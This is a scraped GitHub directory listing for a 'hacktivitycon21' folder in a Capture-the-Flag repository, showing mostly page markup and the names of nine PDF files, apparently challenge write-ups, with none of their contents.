<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
3
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment-discussion UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 2.75a.25.25 0 01.25-.25h8.5a.25.25 0 01.25.25v5.5a.25.25 0 01-.25.25h-3.5a.75.75 0 00-.53.22L3.5 11.44V9.25a.75.75 0 00-.75-.75h-1a.25.25 0 01-.25-.25v-5.5zM1.75 1A1.75 1.75 0 000 2.75v5.5C0 9.216.784 10 1.75 10H2v1.543a1.457 1.457 0 002.487 1.03L7.061 10h3.189A1.75 1.75 0 0012 8.25v-5.5A1.75 1.75 0 0010.25 1h-8.5zM14.5 4.75a.25.25 0 00-.25-.25h-.5a.75.75 0 110-1.5h.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0114.25 12H14v1.543a1.457 1.457 0 01-2.487 1.03L9.22 12.28a.75.75 0 111.06-1.06l2.22 2.22v-2.19a.75.75 0 01.75-.75h1a.25.25 0 00.25-.25v-5.5z"></path></svg> <span>Discussions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/Kartibok/Capture-the-Flag/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Discussions Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/Kartibok/Capture-the-Flag/refs" cache-key="v0:1633940546.926945" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S2FydGlib2svQ2FwdHVyZS10aGUtRmxhZw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/Kartibok/Capture-the-Flag/refs" cache-key="v0:1633940546.926945" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S2FydGlib2svQ2FwdHVyZS10aGUtRmxhZw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>Capture-the-Flag</span></span></span><span>/</span><span><span>competitions</span></span><span>/</span>hacktivitycon21<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>Capture-the-Flag</span></span></span><span>/</span><span><span>competitions</span></span><span>/</span>hacktivitycon21<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/Kartibok/Capture-the-Flag/tree-commit/98ee160580dc390324c3e7c46776f7803bee07de/competitions/hacktivitycon21" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/Kartibok/Capture-the-Flag/file-list/master/competitions/hacktivitycon21"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>bass64.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>hexahedron.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>jed_sheeran.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>pimple.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>read_the_rules.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>six_four_ over_two.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>target_practice.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>to_do.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>tsunami.pdf</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
